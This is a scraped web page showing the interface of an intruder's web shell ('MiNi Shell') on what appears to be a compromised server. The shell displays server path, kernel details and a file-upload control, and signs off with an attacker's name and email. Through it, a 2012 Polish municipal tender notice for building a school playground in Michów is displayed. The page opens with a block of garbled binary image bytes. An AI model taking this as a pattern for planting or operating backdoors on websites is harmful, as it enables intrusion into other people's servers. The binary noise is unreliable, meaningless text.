JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120613/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120613/199218-N-2012.html

<p class="kh_header"><b>Michów: Zaprojektowanie i wykonanie robót budowlanych polegających na wykonaniu placu zabaw w ramach rządowego programu Radosna Szkoła</b><br>
<b>Numer ogłoszenia: 199218 - 2012; data zamieszczenia: 13.06.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Michów , Rynek I 16, 21-140 Michów, woj. lubelskie, tel. 81 8566001, faks 81 8566001 w. 29.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gminamichow.pl www.bip.lublin.pl/michow</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zaprojektowanie i wykonanie robót budowlanych polegających na wykonaniu placu zabaw w ramach rządowego programu Radosna Szkoła.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zaprojektowanie i wykonanie robót budowlanych polegających na wykonaniu placu zabaw w ramach rządowego programu Radosna Szkoła.
Powierzchnia terenu przeznaczonego na plac zabaw - 240 m2. 
1.Przedmiot zamówienia obejmuje wykonanie następujących prac:
1)Przygotowanie materiałów do zgłoszenia rozpoczęcia robót budowlanych nie wymagających pozwolenia na budowę;
2)Opracowanie przez uprawnionego projektanta projektu rozmieszczenia urządzeń zabawowych, bezpiecznej nawierzchni, nawierzchni ścieżek i roślinności oraz przedstawienie go do akceptacji Zamawiającemu. Do projektu muszą być dołączone rysunki lub zdjęcia poszczególnych elementów wyposażenia wraz z podanymi wymiarami oraz wizualizacja placu w formie elektronicznej;
3)Wygrodzenie placu zabaw wzdłuż granic placu zabaw, wygrodzenie w formie formowanego żywopłotu np. ligustr (wysokość sadzonek powyżej 20 cm.) itp. Zamawiający wymaga uwzględnienia zabezpieczenia sadzonek przez pierwszy okres użytkowania np. siatką plastikową, celem ochrony przed zadeptaniem;
4)Budowę, dostawę i montaż urządzeń na placu zabaw;
5)Wykonanie bezpiecznej nawierzchni w strefie bezpieczeństwa urządzenia zabawowego oraz nawierzchni ścieżek;
6)Sporządzenie regulaminu placu zabaw i jego montaż na konstrukcjach dostarczonych przez Wykonawcę. W ramach obowiązków leżących po stronie Wykonawcy w celu prawidłowego wykonania robót dotyczących zarówno etapu projektowania jak również wykonania robót budowlanych oraz prac związanych z nasadzeniem, jest wykonanie wszystkich innych niezbędnych prac potrzebnych do oddania do użytku przedmiotu zamówienia. W cenę zamówienia powinny być wliczone wszelkie koszty ponoszone przez Wykonawcę niezbędne do wykonania przedmiotu zamówienia w tym koszty wszystkich uzgodnień i odbioru robót;
2.Urządzenia zabawowe wskazane przez Zamawiającego:
1)Zestaw zabawowy - wieża zabawowa 2 szt. z mostkiem, pochylnią lub przeplotnią, zjeżdzalnią 2 szt, tunelem ścianką wspinaczkową - rysunek nr 1(rysunek stanowi tylko przekład)
2)Karuzela tarczowa - rysunek nr 2 (rysunek stanowi tylko przekład)
3)Urządzenia na sprężynie: równoważnia, ważka, koniczynka - rysunek nr 3 (rysunek stanowi tylko przekład)
4)Urządzenia na podstawie metalowej: ważka, huśtawka podwójna - rysunek nr 4 (rysunek stanowi tylko przekład)
5)Drabinka pozioma  - rysunek nr 5 (rysunek stanowi tylko przekład)
6)Podwójne drążki gimnastyczne - rysunek nr 6 (rysunek stanowi tylko przekład)
Zaproponowane przez Wykonawcę urządzenia muszą wskazywać opisane powyżej funkcje, a gabarytowo muszą zostać dopasowane do przedziału wiekowego 6-12 lat. Bezpieczna strefa użytkowania dla każdego elementu zostanie określona przez Wykonawcę w opracowanym projekcie, i nie może być mniejsza niż wynikająca z przepisów szczególnych.
3.Oprócz elementów wskazanych powyżej, na terenie przeznaczonym na plac zabaw należy umieścić dodatkowo:
1)Ławka z oparciem o wymiarach min. dł. 1,5m x szer. 0,4m x wys. 1,0m - 2 szt.
2)Kosz na śmieci (z wyciąganym wkładem) - 2 szt.
3)Tablica informacyjna z regulaminem - szt. 1 (Wykonanie i zainstalowanie na terenie szkolnego placu zabaw tablicy zawierającej regulamin określający warunki i zasady korzystania z placu zabaw oraz napis o treści: Szkolny plac zabaw wyposażony w ramach programu rządowego RADOSNA SZKOŁA)
Zamawiający wymaga aby elementy wyposażenia placu zabaw, zaprojektowane zostały konwencji naturalnej z materiałów drewnianych (okrąglaki, bale, drewno klejone, kantówki o wym. 10x10 cm), lin szalowanych, lub łańcuchów i drążków metalowych, zakonserwowanych i zaimpregnowanych odpowiednimi farbami i preparatami do konserwacji drewna zapewniającymi ochronę urządzeń przez okres co najmniej trzech lat (drewno impregnowane ciśnieniowo). Elementy ze stali o wysokiej odporności na rozciąganie zabezpieczone powłoką galwaniczną im polakierowane metodą proszkową. Wszystkie elementy wykończeniowe zastosowane do wykonania wyposażenia placu zabaw winny być wykonane z materiałów lekkich, odpornych i zachowujących kolorystykę w trudnych warunkach atmosferycznych.
Urządzenia dla zapewnienia stabilności powinny być kotwione w gruncie poprzez betonowanie. W przypadku kontaktu z ziemią należy stosować:
1)Stosowanie gatunku drewna o dostatecznej odporności naturalnej zgodnie z klasami 1 i 2 klasyfikacji naturalnej odporności normy EN 350-2: 1994.
2)Gdy drewno znajduje się ponad ziemia na metalowej stopie.
3)Stosowanie drewna poddanego impregnacji ciśnieniowej zgodnie z normą EN 351-1: 1995 i zgodnie z 4 klasą zagrożenia EN 335-2.
4.Podstawowymi, dominującymi kolorami nawierzchni powinny być - pomarańczowe i niebieskie.
Proponowane do wyposażenia placu elementy gotowe jak również robione na zamówienie powinny posiadać stosowne certyfikaty zgodności z warunkami bezpieczeństwa określonymi w szczególności w przepisach w sprawie bezpieczeństwa i higieny w publicznych i niepublicznych szkołach i placówkach.
Wszelkie urządzenia zastosowane na placu zabaw dla dzieci powinny być wykonane zgodnie z wymogami normy PN-EN 1176 (wyposażenie placów zabaw i wymagania bezpieczeństwa).
Nawierzchnie wyposażenia placów zabaw powinny być przepuszczalne bez konieczności stosowania odwodnień skanalizowanych, realizowane winny być zgodnie z wymogami normy PN- EN 1177 (nawierzchnie placów zabaw amortyzujące upadki), piankowa - kolor pomarańczowy - paleta barw PANTONE 152 C; RAL; 2011 Tieforange - ułożone z kształtek, tworzących nieregularne układy powierzchni jako bezpieczna nawierzchnia określona w odniesieniu do małego placu zabaw w ilości ok. 150,0 m2, typu tartan lub inna syntetyczna - rozwijalna, zgodna z wymogami normy - kolor niebieski - paleta barw PANTONE; 540 C; RAL; 5003 Saphirblau - ułożona w postaci wijącej się łagodnymi łukami ścieżki, jako nawierzchnia ścieżek - ok. 20,0 m2.
Ilość zieleni określona w ilości ok. 70,0 m2.
Wszystkie urządzenia mają być zakotwione w gruncie zgodnie z normami w celu bezpiecznego Użytkowania urządzeń.
Norma PN-EN 1176-1 określa jednoznacznie sposób fundamentowania urządzeń zabawowych.
Kształt fundamentu oraz głębokości ich umieszczania są ściśle określone.
Okres, na który Wykonawca udzieli gwarancji to trzy lata od daty odbioru końcowego.
5.  W wartości oferty musi zostać uwzględniona cena nasadzeń nowej zieleni oraz wykonanie nawierzchni trawiastej na pozostałej części placu zabaw, na której nie zostanie ułożona nawierzchnia bezpieczna. Pokrycie powierzchni szkolnego placu zabaw zielenią (trawa odporna na trudne warunki Użytkowania).
6. Za wykonanie przedmiotu zamówienia zamawiający zapłaci Wykonawcy wynagrodzenie ryczałtowe. Wynagrodzenie zostanie zapłacone przez Zamawiającego na rachunek Wykonawcy przelewem w terminie 14 dni od daty wystawienia faktury po dokonaniu odbioru końcowego przedmiotu zamówienia udokumentowanego protokołem odbioru robót  
Zaleca się, aby Wykonawca dokonał wizji lokalnej na terenie objętym zamówieniem oraz zdobył wszelkie informacje, które mogą być konieczne do przygotowania oferty.
7. Nazwy własne producentów, materiałów i urządzeń podane w dokumentach będących dokumentacją przetargowa podane są przykładowo. Dopuszcza się zastosowanie urządzeń równoważnych spełniających wskazane funkcje o parametrach i funkcjonalności nie gorszej niż wskazane urządzenia przez Zamawiającego.
Powyższy zapis nie dotyczy zmiany materiału wskazanego w opisie urządzeń zabawowych, określonego jako materiały naturalne oraz innych wskazywanych w obowiązujących wytycznych MEN.
8.  Roboty budowlane będące przedmiotem zamówienia winny być wykonane zgodnie z opracowaną przez Wykonawcę dokumentacją projektową, warunkami zawartymi w SIWZ oraz wzorem umowy. Na czas prowadzenia robót Wykonawca musi zabezpieczyć teren prac i zapewnić niezbędny dozór oraz kierownictwo robót. Wykonawca będzie prowadził roboty zgodnie z przepisami ustawy Prawo budowlane, Polskimi Normami, sztuką budowlaną oraz przepisami BHP.
9. Wszystkie materiały zastosowane do realizacji zamówienia muszą spełniać warunki określone w art. 10 ustawy z dnia 7 lipca 1994r. Prawo budowlane (Dz. U. z 2006r. Nr 156, poz. 1118 ze zm.)
Wykonawca przedłoży Zamawiającemu na zamontowanie urządzenia zabawowe deklaracje producenta o zgodności z normami wyposażenia placu zabaw, certyfikaty  bezpieczeństwa, deklaracje o zgodności zamontowania urządzeń z instrukcją montażu oraz o nadawaniu się do Użytkowania zgodnie z przeznaczeniem..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.11.27.23-9, 43.32.50.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 2 000,00</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego sposobu oceny spełnienia tego warunku</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w okresie ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zgodnie z zasadami sztuki budowlanej wykonali i prawidłowo ukończyli co najmniej 2 roboty polegające na budowie placów zabaw z nawierzchni poliuretanowej o wartości robót co najmniej 100 000,00 zł netto każda z nich</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego sposobu oceny spełnienia tego warunku</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dysponują osobami, które będą wykonywać zamówienie lub pisemne zobowiązanie innych podmiotów do udostępnienia tych osób, w tym: przynajmniej 1 osoba posiadająca uprawnienia do projektowania tego typu robót (placu zabaw), 1 osoba posiadająca doświadczenie w kierowaniu co najmniej jedną robotą budowlaną polegającą na budowie placu zabaw o nawierzchni poliuretanowej</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego sposobu oceny spełnienia tego warunku</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Formularz oferty sporządzony na podstawie wzoru stanowiącego zał nr 1 do siwz</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zakres przewidywanych zmian postanowień zawartej umowy oraz warunki ich wprowadzenia określono we wzorze umowy stanowiącym integralną część specyfikacji istotnych warunków zamówienia publicznego, który obejmować może m.in. następujące sytuacje i przypadki:
a)co do terminu i wynagrodzenia: - ujawnienie w trakcie realizacji robót
budowlanych urządzeń podziemnych, których istnienie lub lokalizacja nie wynika z map uzbrojenia uzgodnionych przez ZUD, które powodują konieczność wykonania robót dodatkowych, zamiennych lub zamówienia dodatkowego:
b)odkrycie w gruncie przedmiotów nie możliwych do zidentyfikowania przed przystąpieniem do robót budowlanych takich jak m.in. głazy narzutowe, niewybuchy, przedmioty wymagające ochrony Konserwatora Zabytków, które powodują konieczność wykonania robót dodatkowych, zamiennych lub zamówienia dodatkowego;
c)co do terminu: zaistnienie nieprzewidzianych sytuacji, takich jak kolizje komunikacyjne powodujące zniszczenia, uszkodzenia, wymagające naprawy lub wstrzymania robót ze względu na akcję ratowniczą, wpływające na zmianę terminu realizacji zamówienia;
d)w przypadku zaistnienia zdarzeń nadzwyczajnych, w tym zaistnienia klęski żywiołowej w tym huraganów, powodzi, trzęsień ziemi itp.
e)w przypadku zmian: - danych teleadresowych w przypadku ich zamiany, - wynagrodzenia w przypadku ustawowej stawki podatku VAT</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.lublin.pl/michow<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Michów, ul. Rynek I/16, 21-140 Michów, Pokój nr 12.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.06.2012 godzina 10:00, miejsce: Urząd Gminy Michów, ul. Rynek I/16, 21-140 Michów, Pokój nr 12.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com